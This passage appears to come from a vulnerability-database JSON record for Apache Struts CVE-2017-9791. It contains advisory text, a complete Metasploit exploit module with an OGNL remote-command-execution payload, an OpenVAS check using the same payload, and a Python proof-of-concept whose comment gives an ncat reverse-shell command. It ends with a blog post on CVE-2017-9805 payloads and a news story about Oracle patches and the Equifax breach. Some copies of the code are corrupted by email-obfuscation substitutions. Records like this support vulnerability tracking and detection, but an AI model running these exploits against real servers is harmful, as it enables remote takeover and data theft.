raw messages to the ActionMessage. Never pass a raw value directly. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-048> \n\n\n### Platforms\n\nLinux \n \n\n", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "SAINT:9B0459BF5AAA66776C1635BF5AF5A366", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_struts1_showcase", "title": "Apache Struts 2 Struts 1 plugin Showcase OGNL code execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:18", "bulletinFamily": "exploit", "description": "Added: 06/06/2018 \nCVE: [CVE-2017-9791](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9791>) \nBID: [99484](<http://www.securityfocus.com/bid/99484>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. The Struts 1 plugin allows developers to use Struts 1 Actions and ActionForms in Struts 2 applications. The Showcase application is an example application in the Struts 1 plugin. \n\n### Problem\n\nThe Showcase application in the Struts 1 plugin allows a remote attacker to inject commands within OGNL code, resulting in arbitrary command execution. \n\n### Resolution\n\nRemove the Struts 1 plugin and/or the Showcase example application if it is not needed. \n\nAlways use resource keys instead of passing a raw messages to the ActionMessage. Never pass a raw value directly. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/WW/S2-048> \n\n\n### Platforms\n\nLinux \n \n\n", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "SAINT:476415A034C3AC589A6AE035FC3B6E74", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/apache_struts2_struts1_showcase", "title": "Apache Struts 2 Struts 1 plugin Showcase OGNL code execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-04-12T07:50:57", "bulletinFamily": "exploit", "description": "This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value.", "modified": "2018-05-16T10:39:17", "published": "2017-07-15T20:55:47", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CODE_EXEC_SHOWCASE", "href": "", "type": "metasploit", "title": "Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',\n 'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'icez <ic3z at qq dot com>',\n 'Nixawk',\n 'xfer0'\n ],\n 'References' => [\n [ 'CVE', '2017-9791' ],\n [ 'BID', '99484' ],\n [ 'EDB', '42324' ],\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ]\n ],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Universal', {\n 'Platform' => %w{ linux unix win },\n 'Arch' => [ ARCH_CMD ]\n }\n ]\n ],\n 'DisclosureDate' => 'Jul 07 2017',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),\n OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])\n ]\n )\n end\n\n def send_struts_request(ognl)\n var_a = rand_text_alpha_lower(4)\n var_b = rand_text_alpha_lower(4)\n uri = normalize_uri(datastore['TARGETURI'])\n\n data = {\n datastore['POSTPARAM'] => ognl,\n 'age' => var_a,\n '__checkbox_bustedBefore' => 'true',\n 'description' => var_b\n }\n\n resp = send_request_cgi({\n 'uri' => uri,\n 'method' => 'POST',\n 'vars_post' => data\n })\n\n if resp && resp.code == 404\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\n end\n resp\n end\n\n def check\n var_a = rand_text_alpha_lower(4)\n var_b = rand_text_alpha_lower(4)\n ognl = \"%{'#{var_a}' + '#{var_b}'}\"\n\n begin\n resp = send_struts_request(ognl)\n rescue Msf::Exploit::Failed\n return Exploit::CheckCode::Unknown\n end\n\n if resp && resp.code == 200 && resp.body.include?(\"#{var_a}#{var_b}\")\n Exploit::CheckCode::Vulnerable\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n resp = exec_cmd(payload.encoded)\n unless resp and resp.code == 200\n fail_with(Failure::Unknown, \"Exploit failed.\")\n end\n\n print_good(\"Command executed\")\n print_line(resp.body)\n end\n\n def exec_cmd(cmd)\n ognl = \"%{(#_='multipart/form-data').\"\n ognl << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\n ognl << \"(#_memberAccess?(#_memberAccess=#dm):\"\n ognl << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\n ognl << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\n ognl << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\n ognl << \"(#ognlUtil.getExcludedClasses().clear()).\"\n ognl << \"(#context.setMemberAccess(#dm)))).\"\n ognl << \"(#cmd='#{cmd}').\"\n ognl << \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\"\n ognl << \"(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).\"\n ognl << \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\"\n ognl << \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\"\n\n send_struts_request(ognl)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_code_exec_showcase.rb"}], "openvas": [{"lastseen": "2019-02-18T12:50:26", "bulletinFamily": "scanner", "description": "This host is running Apache Struts2 and\n is prone to remote code execution vulnerability.", "modified": "2019-02-15T00:00:00", "published": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310811309", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811309", "title": "Apache Struts2 Showcase Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_showcase_remote_code_exec_vuln.nasl 13679 2019-02-15 08:20:11Z cfischer $\n#\n# Apache Struts2 Showcase Remote Code Execution Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811309\");\n script_version(\"$Revision: 13679 $\");\n script_cve_id(\"CVE-2017-9791\");\n script_bugtraq_id(99484);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-15 09:20:11 +0100 (Fri, 15 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-10 10:54:29 +0530 (Mon, 10 Jul 2017)\");\n script_name(\"Apache Struts2 Showcase Remote Code Execution Vulnerability\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0558.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-048.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/announce.html#a20170707\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and\n is prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a\n special crafted HTTP POST request.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when handling a malicious\n field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action\n and the value is a part of a message presented to the user, i.e. when using\n untrusted input as a part of the error message in the ActionMessage class.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting these issues allow\n remote attackers to execute arbitrary code in the context of the affected\n application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts 2.3.x with Struts 1 plugin and Struts 1 action\");\n\n script_tag(name:\"solution\", value:\"As mitigation always use resource keys\n instead of passing a raw message to the ActionMessage as shown below, never\n pass a raw value directly.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nport = get_http_port( default:8080 );\nhost = http_host_name( dont_add_port:TRUE );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n found = TRUE;\n break;\n }\n}\n\nif( ! found ) exit( 0 );\n\ncmds = exploit_commands();\nforeach cmd ( keys( cmds ) )\n{\n c = cmds[ cmd ];\n\n data = \"name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%3D\" +\n \"@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%\" +\n \"3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23cont\" +\n \"ext%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%\" +\n \"29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphon\" +\n \"y.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPa\" +\n \"ckageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClass\" +\n \"es%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%2\" +\n \"9%29%29%29.%28%23cmd%3D%27\" + c + \"%27%29.%28%23iswin%3D%28@jav\" +\n \"a.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.\" +\n \"contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27\" +\n \"cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C\" +\n \"%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBui\" +\n \"lder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%\" +\n \"28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.s\" +\n \"truts2.ServletActionContext@getResponse%28%29.getOutputStream%2\" +\n \"8%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.\" +\n \"getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D\" +\n \"&age=123&__cheackbox_bustedBefore=true&description=123\";\n\n url = \"/struts2-showcase/integration/saveGangster.action\";\n req = http_post_req( port:port, url:url, data:data,\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'));\n recv = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if(egrep( pattern:cmd, string:recv))\n {\n report = 'It was possible to execute the command ' + cmds[ cmd ] +\n ' on the remote host.\\n\\nRequest:\\n\\n' + req +\n '\\n\\nResponse:\\n\\n' + recv;\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-05-18T18:37:23", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category remote exploits", "modified": "2018-05-18T00:00:00", "published": "2018-05-18T00:00:00", "id": "1337DAY-ID-30374", "href": "https://0day.today/exploit/description/30374", "title": "Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',\r\n 'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'icez <ic3z at qq dot com>',\r\n 'Nixawk',\r\n 'xfer0'\r\n ],\r\n 'References' => [\r\n [ 'CVE', '2017-9791' ],\r\n [ 'BID', '99484' ],\r\n [ 'EDB', '42324' ],\r\n [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ linux unix win },\r\n 'Arch' => [ ARCH_CMD ]\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => 'Jul 07 2017',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),\r\n OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])\r\n ]\r\n )\r\n end\r\n \r\n def send_struts_request(ognl)\r\n var_a = rand_text_alpha_lower(4)\r\n var_b = rand_text_alpha_lower(4)\r\n uri = normalize_uri(datastore['TARGETURI'])\r\n \r\n data = {\r\n datastore['POSTPARAM'] => ognl,\r\n 'age' => var_a,\r\n '__checkbox_bustedBefore' => 'true',\r\n 'description' => var_b\r\n }\r\n \r\n resp = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'POST',\r\n 'vars_post' => data\r\n })\r\n \r\n if resp && resp.code == 404\r\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\r\n end\r\n resp\r\n end\r\n \r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n var_b = rand_text_alpha_lower(4)\r\n ognl = \"%{'#{var_a}' + '#{var_b}'}\"\r\n \r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n if resp && resp.code == 200 && resp.body.include?(\"#{var_a}#{var_b}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n resp = exec_cmd(payload.encoded)\r\n unless resp and resp.code == 200\r\n fail_with(Failure::Unknown, \"Exploit failed.\")\r\n end\r\n \r\n print_good(\"Command executed\")\r\n print_line(resp.body)\r\n end\r\n \r\n def exec_cmd(cmd)\r\n ognl = \"%{(#_='multipart/form-data').\"\r\n ognl << \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n ognl << \"(#_memberAccess?(#_memberAccess=#dm):\"\r\n ognl << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n ognl << \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n ognl << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n ognl << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n ognl << \"(#context.setMemberAccess(#dm)))).\"\r\n ognl << \"(#cmd='#{cmd}').\"\r\n ognl << \"(#iswin=(@[email\u00a0protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\"\r\n ognl << \"(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).\"\r\n ognl << \"(#ros=(@[email\u00a0protected]().getOutputStream())).\"\r\n ognl << \"(@[email\u00a0protected](#process.getInputStream(),#ros)).(#ros.flush())}\"\r\n \r\n send_struts_request(ognl)\r\n end\r\nend\n\n# 0day.today [2018-05-18] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/30374"}, {"lastseen": "2018-01-26T23:07:35", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2017-07-14T00:00:00", "published": "2017-07-14T00:00:00", "href": "https://0day.today/exploit/description/28135", "id": "1337DAY-ID-28135", "title": "Apache Struts 2.3.x Showcase - Remote Code Execution (PoC) Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# Just a demo for CVE-2017-9791\r\n \r\n \r\nimport requests\r\n \r\n \r\ndef exploit(url, cmd):\r\n print(\"[+] command: %s\" % cmd)\r\n \r\n payload = \"%{\"\r\n payload += \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n payload += \"(#_memberAccess?(#_memberAccess=#dm):\"\r\n payload += \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n payload += \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n payload += \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n payload += \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n payload += \"(#context.setMemberAccess(#dm)))).\"\r\n payload += \"(@[email\u00a0protected]().exec('%s'))\" % cmd\r\n payload += \"}\"\r\n \r\n data = {\r\n \"name\": payload,\r\n \"age\": 20,\r\n \"__checkbox_bustedBefore\": \"true\",\r\n \"description\": 1\r\n }\r\n \r\n headers = {\r\n 'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'\r\n }\r\n requests.post(url, data=data, headers=headers)\r\n \r\n \r\nif __name__ == '__main__':\r\n import sys\r\n \r\n if len(sys.argv) != 3:\r\n print(\"python %s <url> <cmd>\" % sys.argv[0])\r\n sys.exit(0)\r\n \r\n print('[*] exploit Apache Struts2 S2-048')\r\n url = sys.argv[1]\r\n cmd = sys.argv[2]\r\n \r\n exploit(url, cmd)\r\n \r\n # $ ncat -v -l -p 4444 &\r\n # $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action \"ncat -e /bin/bash 127.0.0.1 4444\"\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28135"}], "pentestit": [{"lastseen": "2017-09-07T06:14:05", "bulletinFamily": "blog", "description": "PenTestIT RSS Feed\n\nThere is a saying making rounds now that \"Apache Struts is like the WebGoat of all frameworks\" and the current exploit which is being tracked under **CVE-2017-9805** and the Apache Struts bulletin - [S2-052](<https://cwiki.apache.org/confluence/display/WW/S2-052>) prooves just that. If you remember, I had covered another vulnerability a couple of months ago - which is tracked under [S2-048](<http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/>) & CVE-2017-9791.\n\n\n\n## What is the Apache Struts2 CVE-2017-9805 vulnerability about?\n\nThe original advisory [**here**](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) mentions the vulnerability briefly. However, the Apache Foundation description was enough for people to create a PoC even before the discoverer could make these details public. Interestingly, the original advisory has been updated to mention this - \"_Updated on 6 September: added a warning regarding multiple working exploits having been published by third parties.\"_ The vendor advisory states this - \"_The REST Plugin is using a `XStreamHandler` with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when de-serializing XML payloads._\"\n\nI will not go into the details about how do you exploit this vulnerability, as I tweeted about the PoC availability yesterday itself:\n\n> CVE-2017-9805, <https://t.co/doP89huIGN> (S2-052) POC - <https://t.co/ZwTMWmTY1A>\n> \n> -- Pentestit (@pentestit) [September 5, 2017](<https://twitter.com/pentestit/status/905214097246978052>)\n\nThe PoC there works good and kudos to the author! This post tries to list down a few more payloads that I could think will be interesting to use. Without further ado, we begin with the different payloads:\n\nCVE-2017-9805 payload for a reverse connection via MSTSC (Terminal Server Connection):\n\n\n\nThis has a high success rate on Windows systems which can \"connect back\" to you.\n\nCVE-2017-9805 payload for file download no execution (figure that part out): \n \nShould work on almost all Microsoft Windows systems as long as Tomcat has the right privileges set. \nCVE-2017-9805 payload for file download on a Linux machine: \n \nThis should also work on a good amount of systems that has cURL.\n\n## Fix CVE-2017-9805:\n\nAs the Apache Foundation suggests, the first option is to upgrade to [Struts 2.5.13](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.13>) or [Struts 2.3.34](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.34>). Secondly, you can upgrade the plugin by uploading all the required plugin JARs and it's dependencies.\n\nThe post [S2-052: Apache Struts2 REST Plugin Payloads (CVE-2017-9805)](<http://pentestit.com/apache-struts2-rest-plugin-remote-code-execution-cve-2017-9805/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2017-09-07T05:33:35", "published": "2017-09-07T05:33:35", "href": "http://pentestit.com/apache-struts2-rest-plugin-remote-code-execution-cve-2017-9805/", "id": "PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7", "title": "S2-052: Apache Struts2 REST Plugin Payloads (CVE-2017-9805)", "type": "pentestit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:33", "bulletinFamily": "info", "description": "Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.\n\nThe Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\nScores of Oracle products, roughly two dozen in total, are affected by the vulnerability. Multiple versions of Oracle\u2019s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).\n\nOracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.\n\n> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>\n> \n> \u2014 US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)\n\nOracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month\u2019s advisory without delay.\n\nEquifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nThe credit bureau\u2019s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in wake of the breach. In his stead the company said Paulino do Rego Barros Jr., who previously served as president of the company\u2019s Asia-Pacific division, will assume the role of interim chief executive.\n\nPrior to announcing the news, trading of Equifax shares was halted Tuesday morning.\n\nThe CEO will forgo his 2017 bonus according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith\u2019s benefits until its Board of Directors completes their independent review of the breach.\n\n\u201cThe cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,\u201d Smith said in a statement Tuesday.\n\n\u201cOur interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry. The Board of Directors has absolute confidence in his ability to guide the company through this transition,\u201d Mark Feidler, the Board\u2019s non-executive chairman, said.\n\nSmith\u2019s departure comes [a week after the company](<Smith's%20departure%20comes%20a%20week%20after%20the%20company%20announced%20its%20chief%20information%20officer%20David%20Webb%20and%20chief%20security%20officer%20Susan%20Mauldin,%20would%20be%20retiring.>) announced its chief information officer David Webb and chief security officer Susan Mauldin, would also be retiring.\n\nDespite retiring, according to reports Smith is still on track to testify before the Senate Banking Committee next week, on Oct. 4.\n\nSmith will likely get an earful from senators next week, including Mark Warner (D-VA). On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a \u201ctravesty.\u201d\n\n\u201cWe have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I\u2019m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it\u2019s cybersecurity.\u201d Warner said.\n\n\u201cI think Equifax is a travesty. I think the resignation of the CEO is by no means enough\u2026 Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability \u2013 they had known for months, and if they had simply put a patch in place we might have precluded this\u2026 I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.\u201d\n", "modified": "2017-09-26T14:28:26", "published": "2017-09-26T14:28:26", "id": "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "href": "https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/", "type": "threatpost", "title": "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
